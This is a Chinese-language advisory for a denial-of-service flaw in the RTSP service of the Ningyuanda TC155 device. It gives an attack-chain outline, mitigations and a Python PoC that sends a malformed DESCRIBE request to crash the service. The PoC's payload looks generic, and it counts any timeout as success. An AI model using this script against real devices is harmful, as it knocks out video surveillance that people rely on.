CVE-2025-14747: 宁宇达TC155 RTSP服务拒绝服务漏洞

漏洞信息

漏洞编号

CVE-2025-14747

漏洞类型

拒绝服务

CVSS评分

4.3 中危

攻击向量

邻接 (AV:A)

认证要求

无需认证 (PR:N)

用户交互

无需交互 (UI:N)

影响产品

Ningyuanda TC155 57.0.2.0

漏洞概述

CVE-2025-14747是影响宁宇达（Ningyuanda）TC155设备57.0.2.0版本的RTSP服务拒绝服务漏洞。该漏洞存在于设备的RTSP（实时流协议）服务组件中，攻击者通过发送畸形的RTSP Describe请求包，可以导致RTSP服务崩溃或无响应，从而造成设备监控功能中断。由于该漏洞的利用代码已被公开，且厂商在接到通知后未做出任何回应，漏洞存在被恶意利用的风险。攻击者需位于本地网络（邻接网络）即可发起攻击，无需任何认证凭证或用户交互。该漏洞的CVSS评分为4.3，属于中等严重程度，主要影响可用性维度。

技术细节

该漏洞位于宁宇达TC155设备的RTSP服务实现中。RTSP（Real Time Streaming Protocol，实时流协议）是一种用于控制多媒体服务器传输的应用层协议，广泛应用于IP摄像机和网络视频监控系统。漏洞源于RTSP服务在处理畸形的Describe请求时缺乏适当的输入验证和错误处理机制。当攻击者构造包含异常参数的Describe请求并发送到RTSP服务端口（通常为554或8554）时，服务进程可能出现内存访问错误、空指针引用或异常终止，从而导致拒绝服务状态。由于CVSS向量显示攻击复杂度低（AC:L），且无需认证（PR:N）和用户交互（UI:N），攻击者可以自动化脚本实现批量探测和攻击。攻击者位于本地网络（AV:A）即可实施攻击，通过发送精心构造的RTSP请求包触发服务异常。

攻击链分析

STEP 1

步骤1

信息收集：攻击者扫描目标网络，发现运行RTSP服务的宁宇达TC155设备（默认端口554/8554）

STEP 2

步骤2

构造攻击载荷：攻击者构造包含畸形参数的RTSP Describe请求，包含无效的Authorization字段和特殊字符

STEP 3

步骤3

发送恶意请求：攻击者从本地网络（邻接网络）向目标RTSP服务端口发送畸形请求包

STEP 4

步骤4

触发漏洞：RTSP服务在解析畸形的Describe请求时发生异常，导致进程崩溃或进入无响应状态

STEP 5

步骤5

达成DoS：视频监控流中断，设备无法正常提供实时流服务，监控系统失效

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

#!/usr/bin/env python3
# CVE-2025-14747 PoC - Ningyuanda TC155 RTSP Service DoS
# Target: RTSP Service on Ningyuanda TC155 device
# Attack Type: Denial of Service via malformed RTSP Describe request

import socket
import sys

def send_malformed_rtsp_request(target_ip, rtsp_port=554):
    """
    Send a malformed RTSP Describe request to trigger DoS condition
    """
    # Crafted malformed RTSP Describe request with invalid headers
    # This causes service crash or hang on vulnerable devices
    malformed_request = (
        "DESCRIBE rtsp://{}:{}/ RTSP/1.0\r\n"
        "CSeq: 1\r\n"
        "User-Agent: PoC-Exploit\r\n"
        "Accept: application/sdp\r\n"
        "Authorization: Invalid\x00\x01\x02\r\n"
        "\r\n"
    ).format(target_ip, rtsp_port)
    
    try:
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(5)
        sock.connect((target_ip, rtsp_port))
        print(f"[*] Connected to {target_ip}:{rtsp_port}")
        
        print(f"[*] Sending malformed RTSP Describe request...")
        sock.send(malformed_request.encode('utf-8'))
        
        response = sock.recv(4096)
        print(f"[*] Received response: {response.decode('utf-8', errors='ignore')}")
        
        sock.close()
        print("[+] Malformed request sent successfully")
        return True
        
    except socket.timeout:
        print("[!] Connection timeout - service may be unresponsive (DoS successful)")
        return True
    except ConnectionRefusedError:
        print("[!] Connection refused - target may be down")
        return False
    except Exception as e:
        print(f"[!] Error: {str(e)}")
        return False

if __name__ == "__main__":
    if len(sys.argv) < 2:
        print("Usage: python3 cve-2025-14747-poc.py <target_ip> [port]")
        print("Example: python3 cve-2025-14747-poc.py 192.168.1.100 554")
        sys.exit(1)
    
    target = sys.argv[1]
    port = int(sys.argv[2]) if len(sys.argv) > 2 else 554
    
    print(f"[*] CVE-2025-14747 PoC - Ningyuanda TC155 RTSP DoS")
    print(f"[*] Target: {target}:{port}")
    
    send_malformed_rtsp_request(target, port)

影响范围

Ningyuanda TC155 57.0.2.0

防御指南

临时缓解措施

在网络层面实施访问控制策略，通过防火墙限制只有受信任的IP地址才能访问RTSP服务端口（554/8554）。部署网络入侵检测系统监控异常的RTSP流量模式，及时发现和阻断针对RTSP服务的恶意请求。同时建议网络分段，将物联网设备部署在独立的隔离网段，减少攻击面。